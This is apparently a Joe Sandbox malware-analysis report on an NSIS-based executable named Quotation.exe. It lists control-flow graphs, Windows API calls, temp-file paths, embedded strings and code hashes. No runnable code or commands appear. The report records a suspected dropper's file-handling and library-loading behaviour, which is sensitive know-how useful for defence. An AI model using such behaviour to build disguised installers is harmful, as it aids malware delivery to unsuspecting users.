                                                                                            control_flow_graph 329 40154a-4015bd 330 402ea1 329->330 331 4015c3-4015c7 329->331 351 402ea5 330->351 332 4016c1-4016cf 331->332 333 4017c2-401e9e call 40303e call 4065ad 331->333 334 401684-4016aa 331->334 335 4015e6-4015ee 331->335 336 4018cb-4018d4 call 40303e call 406a34 331->336 337 40160c-40160d 331->337 338 4015ce-4015d0 331->338 339 4016ef-4016fb call 40303e SetFileAttributesW 331->339 340 4016af-4016bc call 4065fd 331->340 341 40182f-40184b call 40303e GetFullPathNameW 331->341 342 401711-401728 call 40303e call 406ba3 331->342 343 401633-40163a SetForegroundWindow 331->343 344 4017d3-4017f6 call 40303e * 3 MoveFileW 331->344 345 4015d5-4015d6 331->345 346 401618-40162e call 403002 Sleep 331->346 347 4015f9-401607 call 4030fd call 401399 331->347 348 40189b-4018b8 call 40303e SearchPathW 331->348 349 4018de-401904 call 40303e call 406de1 331->349 350 40163f-401645 331->350 353 4016d1-4016d5 ShowWindow 332->353 354 4016d9-4016e0 332->354 425 401bb2-401bb6 333->425 426 401ea4-401ea8 333->426 355 402ead-402eb7 334->355 358 4015f0-4015f7 PostQuitMessage 335->358 359 4015dc-4015e1 335->359 409 4018d9 336->409 364 40160e-401613 call 405d18 337->364 338->355 391 401701-401703 339->391 340->330 389 401857-40185d 341->389 390 40184d-401855 341->390 415 401784-40178e 342->415 416 40172a-40173f call 4065d4 342->416 343->330 432 401804-401808 344->432 433 4017f8-4017ff 344->433 356 4015d7 call 405d18 345->356 346->330 347->355 348->330 395 4018be-4018c6 348->395 418 401906-40190c call 406af8 349->418 419 40190e-401920 call 406af8 call 406534 lstrcatW 349->419 369 401671-40167f 350->369 370 401647 350->370 371 402eab 351->371 353->354 354->330 375 4016e6-4016ea ShowWindow 354->375 356->359 358->359 359->355 364->330 369->330 387 401657-40166c call 403002 370->387 388 401649-401650 370->388 371->355 375->330 387->330 388->387 402 40187b 389->402 403 40185f-401862 389->403 401 40187f-401883 390->401 391->330 404 401709-40170c 391->404 395->351 401->351 413 401889-401896 GetShortPathNameW 401->413 402->401 403->402 412 401864-40186c call 4065ad 403->412 404->351 409->391 412->390 438 40186e-401876 call 406af8 412->438 413->351 420 401790-4017ab call 405d18 call 406af8 SetCurrentDirectoryW 415->420 421 4017bb-4017bd 415->421 439 401741-401745 416->439 440 401758-401759 call 405dfc 416->440 442 401925-40192d call 406d1b 418->442 419->442 420->330 456 4017b1-4017b6 420->456 421->364 425->355 426->355 432->404 441 40180e-401816 call 4065ad 432->441 433->364 438->402 439->440 447 401747-40174e call 4064da 439->447 454 40175e-401760 440->454 441->404 458 40181c-40182a call 40621b 441->458 455 40192e-401931 442->455 447->440 464 401750-401751 call 405e1c 447->464 459 401762-401767 454->459 460 401775-40177e 454->460 462 401933-40193d call 4065ad 455->462 463 401964-401966 455->463 456->330 458->364 466 401774 459->466 467 401769-401772 GetFileAttributesW 459->467 460->416 461 401780 460->461 461->415 477 401950-401960 462->477 478 40193f-40194e CompareFileTime 462->478 469 401968-401969 call 406b7b 463->469 470 40196e-401989 call 4068f9 463->470 476 401756 464->476 466->460 467->460 467->466 469->470 480 401a18-401a49 call 405d18 call 403148 470->480 481 40198f-401991 470->481 476->454 477->463 478->477 493 401a52-401a5a SetFileTime 480->493 494 401a4b-401a50 480->494 483 401993-4019df call 406af8 * 2 call 405e98 call 406af8 call 406a86 481->483 484 4019fd-401a13 call 405d18 481->484 483->455 512 4019e5-4019e8 483->512 484->351 496 401a60-401a6d CloseHandle 493->496 494->493 494->496 496->330 498 401a73-401a76 496->498 500 401a78-401a87 call 405e98 lstrcatW 498->500 501 401a89-401a8c call 405e98 498->501 507 401a91-401a9c call 406a86 500->507 501->507 507->359 513 4019f2-4019f8 512->513 514 4019ea-4019ed 512->514 513->371 514->356
                                                                                            APIs
                                                                                            • PostQuitMessage.USER32(00000000), ref: 004015F1
                                                                                            • Sleep.KERNELBASE(00000001,?,00000000,00000000), ref: 00401628
                                                                                            • SetForegroundWindow.USER32 ref: 00401634
                                                                                            • ShowWindow.USER32(?,00000000,?,?,00000000,00000000), ref: 004016D3
                                                                                            • ShowWindow.USER32(?,?,?,?,00000000,00000000), ref: 004016E8
                                                                                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0,?,?,00000000,00000000), ref: 004016FB
                                                                                            • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0,?,?,00000000,00000000), ref: 0040176A
                                                                                            • SetCurrentDirectoryW.KERNELBASE(00000000,C:\Users\user\overlays\besvangredes\Konditorierne,00000000,000000E6,C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll,00000000,000000F0,?,?,00000000,00000000), ref: 004017A3
                                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 004017EE
                                                                                            • GetFullPathNameW.KERNEL32(00000000,00000400,00000000,?,00000000,000000E3,C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll,?,?,00000000,00000000), ref: 00401843
                                                                                            • GetShortPathNameW.KERNEL32(00000000,00000000,00000400), ref: 00401890
                                                                                            • SearchPathW.KERNEL32(00000000,00000000,00000000,00000400,00000000,?,000000FF,?,?,00000000,00000000), ref: 004018B0
                                                                                            • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\overlays\besvangredes\Konditorierne,00000000,00000000,00000031,00000000,00000000,000000EF,?,?,00000000,00000000), ref: 00401920
                                                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\overlays\besvangredes\Konditorierne,00000000,00000000,00000031,00000000,00000000,000000EF), ref: 00401948
                                                                                            • SetFileTime.KERNELBASE(?,?,00000000,?,?,?,00000000,00000000,000000EA,?,Call,40000000,00000001,Call,00000000,00000000), ref: 00401A5A
                                                                                            • CloseHandle.KERNELBASE(?,?,?,00000000,00000000), ref: 00401A61
                                                                                            • lstrcatW.KERNEL32(Call,?,Call,000000E9,?,?,00000000,00000000), ref: 00401A82
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp$C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll$C:\Users\user\overlays\besvangredes\Konditorierne$Call
                                                                                            • API String ID: 3895412863-1325301756
                                                                                            • Opcode ID: 907391b652bc81e351481e76b091bf194ed4adcc93ce6230dc48087d29c5e171
                                                                                            • Instruction ID: f97e61f8377ab9e25a0dd965f2557d34b91b3991d6c9f65f1b163fc05bb86adc
                                                                                            • Opcode Fuzzy Hash: 907391b652bc81e351481e76b091bf194ed4adcc93ce6230dc48087d29c5e171
                                                                                            • Instruction Fuzzy Hash: 6AD1D571644301ABC710BF66CD85E2B76A8AF86758F10463FF452B22E1DB7CD8019A6F

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 515 4033cb-403418 GetTickCount GetModuleFileNameW call 4068f9 518 403424-403454 call 406af8 call 406cee call 406af8 GetFileSize 515->518 519 40341a-40341f 515->519 527 403550-40355f call 403367 518->527 528 40345a 518->528 520 403623-40362a 519->520 534 403565-403567 527->534 535 40361e 527->535 529 40345e-403484 call 40311b 528->529 536 403616-40361d call 403367 529->536 537 40348a-403491 529->537 538 403598-4035c8 GlobalAlloc call 403131 call 403148 534->538 539 403569-403581 call 403131 call 406926 534->539 535->520 536->535 542 403512-403515 537->542 543 403493-4034ac call 406692 537->543 538->535 566 4035ca-4035dc 538->566 557 403586-403588 539->557 546 403517-40351e call 403367 542->546 547 40351f-403525 542->547 543->547 560 4034ae-4034b6 543->560 546->547 553 403527-403536 call 406e1a 547->553 554 40353a-403542 547->554 553->554 554->529 562 403548-40354c 554->562 557->535 563 40358e-403592 557->563 560->547 565 4034b8-4034c0 560->565 562->527 563->535 563->538 565->547 567 4034c2-4034ca 565->567 568 4035e4-4035e7 566->568 569 4035de 566->569 567->547 570 4034cc-4034d4 567->570 571 4035ea-4035f2 568->571 569->568 570->547 572 4034d6-4034f5 570->572 571->571 573 4035f4-40360d SetFilePointer call 406692 571->573 572->535 574 4034fb-403501 572->574 576 403612-403614 573->576 574->562 577 403503-40350c 574->577 576->520 577->547 578 40350e-403510 577->578 578->547
                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 004033DE
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Quotation.exe,00000400), ref: 004033FA
                                                                                              • Part of subcall function 004068F9: GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 004068FD
                                                                                              • Part of subcall function 004068F9: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Quotation.exe,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 00403444
                                                                                            • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040359E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                            • String ID: C:\Users\user\Desktop$C:\Users\user\Desktop\Quotation.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                            • API String ID: 2803837635-2520809451
                                                                                            • Opcode ID: 89db09ba3d9e86f9c075612005f46009679623d63feb2a5cce1b372a96914bed
                                                                                            • Instruction ID: 8295773d5102a3db2c924d587f32f5b95c2827ef7f93a52122a4f4d2b553c90e
                                                                                            • Opcode Fuzzy Hash: 89db09ba3d9e86f9c075612005f46009679623d63feb2a5cce1b372a96914bed
                                                                                            • Instruction Fuzzy Hash: B951D371904300AFD720AF25DD81B1B7AA8BB8471AF10453FF955B62E1CB3D8E548B6E

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 579 405e98-405ea1 580 405ea3-405eb2 579->580 581 405eb4-405ecf 579->581 580->581 582 405ed1-405edc 581->582 583 405ee6-405eed 581->583 582->583 584 405ede-405ee2 582->584 585 4060e1-4060e8 583->585 586 405ef3-405ef6 583->586 584->583 588 4060f3 585->588 589 4060ea-4060f1 call 406af8 585->589 587 405ef7-405f05 586->587 591 405f0b-405f16 587->591 592 4060dc-4060e0 587->592 590 4060f5-4060fb 588->590 589->590 594 4060b5 591->594 595 405f1c-405f60 591->595 592->585 597 4060c3 594->597 598 4060b7-4060c1 594->598 599 406060-406063 595->599 600 405f66-405f77 595->600 601 4060c6 597->601 598->601 602 406065-406068 599->602 603 406099-40609c 599->603 604 405fb7-405fba 600->604 605 405f79-405f97 call 406955 600->605 613 4060c8-4060d6 601->613 611 406078-40608f call 406af8 602->611 612 40606a-406076 call 4065fd 602->612 607 4060a7-4060b3 lstrlenW 603->607 608 40609e-4060a2 call 405e98 603->608 609 405fca-405fcd 604->609 610 405fbc-405fc8 GetSystemDirectoryW 604->610 614 405f9c-405fa5 605->614 607->613 608->607 617 405fdd-405fe5 609->617 618 405fcf-405fdb GetWindowsDirectoryW 609->618 616 406038 610->616 611->607 632 406091-406097 call 406d1b 611->632 612->607 613->587 613->592 621 40603c-406041 614->621 622 405fab-405fb2 call 405e98 614->622 616->621 623 405fe7-405ff0 617->623 624 405ffc-406012 SHGetSpecialFolderLocation 617->624 618->616 627 406043-406046 621->627 628 406054-40605e call 406d1b 621->628 622->621 637 405ff8-405ffa 623->637 630 406014-40602d SHGetPathFromIDListW CoTaskMemFree 624->630 631 40602f-406036 624->631 627->628 634 406048-40604e lstrcatW 627->634 628->607 630->616 630->631 631->616 631->617 632->607 634->628 637->616 637->624
                                                                                            APIs
                                                                                            • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00405FC2
                                                                                              • Part of subcall function 00406AF8: lstrcpynW.KERNEL32(?,?,00000400,0040384F,007A7540,NSIS Error), ref: 00406B05
                                                                                              • Part of subcall function 00406D1B: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406D90
                                                                                              • Part of subcall function 00406D1B: CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
                                                                                              • Part of subcall function 00406D1B: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DA4
                                                                                              • Part of subcall function 00406D1B: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DBC
                                                                                            • GetWindowsDirectoryW.KERNEL32(Call,00000400,Skipped: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll,?,?,?), ref: 00405FD5
                                                                                            • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll,?,?,?), ref: 0040604E
                                                                                            • lstrlenW.KERNEL32(Call,Skipped: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll,?,?,?), ref: 004060A8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: Char$Next$Directory$PrevSystemWindowslstrcatlstrcpynlstrlen
                                                                                            • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                            • API String ID: 4187626192-632833649
                                                                                            • Opcode ID: 90908ed2b1fff3d7c45b9d6734c0443e5caff99512698a5aebad6b02f2870112
                                                                                            • Instruction ID: e5fb9ae88836c379eadb94168964a2c41ebb3bf79b6cd8bfde1838e31315b013
                                                                                            • Opcode Fuzzy Hash: 90908ed2b1fff3d7c45b9d6734c0443e5caff99512698a5aebad6b02f2870112
                                                                                            • Instruction Fuzzy Hash: 0E6115716442159BDB24AB288C40A3B76A4EF99350F11853FF982F72D1EB3CC9258B5E

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 704 405d18-405d24 705 405df5-405df9 704->705 706 405d2a-405d3d 704->706 707 405d49-405d59 lstrlenW 706->707 708 405d3f-405d44 call 405e98 706->708 710 405d5b-405d6a lstrlenW 707->710 711 405d7e 707->711 708->707 712 405d70-405d7c lstrcatW 710->712 713 405df2-405df4 710->713 714 405d83-405d86 711->714 712->714 713->705 715 405d95-405d98 714->715 716 405d88-405d8f SetWindowTextW 714->716 717 405de0-405de2 715->717 718 405d9a-405dde SendMessageW * 3 715->718 716->715 717->713 719 405de4-405dea 717->719 718->717 719->713
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll,?,00000000,?,?), ref: 00405D4A
                                                                                            • lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll,?,00000000,?,?), ref: 00405D5C
                                                                                            • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll,?,00000000,?,?), ref: 00405D77
                                                                                            • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll), ref: 00405D8F
                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405DB6
                                                                                            • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DD1
                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405DDE
                                                                                              • Part of subcall function 00405E98: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll,?,?,?), ref: 0040604E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$lstrcatlstrlen$TextWindow
                                                                                            • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll
                                                                                            • API String ID: 1759915248-3823302012
                                                                                            • Opcode ID: b3a3bffc108da763a0d5830401e4444f920c759f89e848b3eba3191ccd966a9d
                                                                                            • Instruction ID: eb00d4876afd5f62942919e2a46038e7a2417e41af97232aca8a81e0ace8ac77
                                                                                            • Opcode Fuzzy Hash: b3a3bffc108da763a0d5830401e4444f920c759f89e848b3eba3191ccd966a9d
                                                                                            • Instruction Fuzzy Hash: C7212672A056206BC310AF598D44E5BBBDCFF95310F04443FF988B3291C7B89D018BAA

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 720 403148-403181 721 403190-4031a4 call 406926 720->721 722 403183-40318b call 403131 720->722 726 403357 721->726 727 4031aa-4031b0 721->727 722->721 730 403359 726->730 728 4031b6-4031e0 GetTickCount 727->728 729 4032f9-4032fb 727->729 734 4032f1-4032f3 728->734 735 4031e6-4031fd call 40311b 728->735 731 403340-403355 call 40311b 729->731 732 4032fd-4032ff 729->732 733 40335a-403364 730->733 731->726 731->734 732->734 736 403301 732->736 734->733 735->726 743 403203-403211 735->743 739 403306-403316 call 40311b 736->739 739->726 746 403318-403328 call 4069e9 739->746 745 40321b-403237 call 406e86 743->745 751 4032f5-4032f7 745->751 752 40323d-40325d GetTickCount 745->752 753 40332a-403338 746->753 754 40333c-40333e 746->754 751->730 755 4032aa-4032b0 752->755 756 40325f-403268 752->756 753->739 759 40333a 753->759 754->730 757 4032b2-4032b4 755->757 758 4032e9-4032eb 755->758 760 40326a-40326c 756->760 761 40326e-4032a6 MulDiv wsprintfW call 405d18 756->761 763 4032b6-4032bf call 4069e9 757->763 764 4032ce-4032d6 757->764 758->734 758->735 759->734 760->755 760->761 761->755 768 4032c4-4032c6 763->768 767 4032da-4032e1 764->767 767->745 769 4032e7 767->769 768->754 770 4032c8-4032cc 768->770 769->734 770->767
                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 004031B6
                                                                                            • GetTickCount.KERNEL32 ref: 00403248
                                                                                            • MulDiv.KERNEL32(?,00000064,?), ref: 00403278
                                                                                            • wsprintfW.USER32 ref: 00403289
                                                                                              • Part of subcall function 00403131: SetFilePointer.KERNELBASE(?,00000000,00000000,004035B5,?), ref: 0040313F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountTick$FilePointerwsprintf
                                                                                            • String ID: ... %d%%$<Py
                                                                                            • API String ID: 999035486-2352372732
                                                                                            • Opcode ID: de52eb9ac16236f3fca6093ce857b7e1a1bc104f410f064c541848c7e306c8f4
                                                                                            • Instruction ID: cddf24be581f0244f3449d1f5e961e9f445dbb2a95aafc889e314ca9340d81f7
                                                                                            • Opcode Fuzzy Hash: de52eb9ac16236f3fca6093ce857b7e1a1bc104f410f064c541848c7e306c8f4
                                                                                            • Instruction Fuzzy Hash: FD519F702083028BD710DF29DE85B2B7BE8AB84756F14093EFC54F22D1DB38DA048B5A

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 771 40617c-40619c GetSystemDirectoryW 772 4061b6 771->772 773 40619e-4061a0 771->773 775 4061b8 772->775 773->772 774 4061a2-4061ad 773->774 774->775 776 4061af-4061b4 774->776 777 4061bd-4061ea wsprintfW LoadLibraryExW 775->777 776->777
                                                                                            APIs
                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
                                                                                            • wsprintfW.USER32 ref: 004061CF
                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
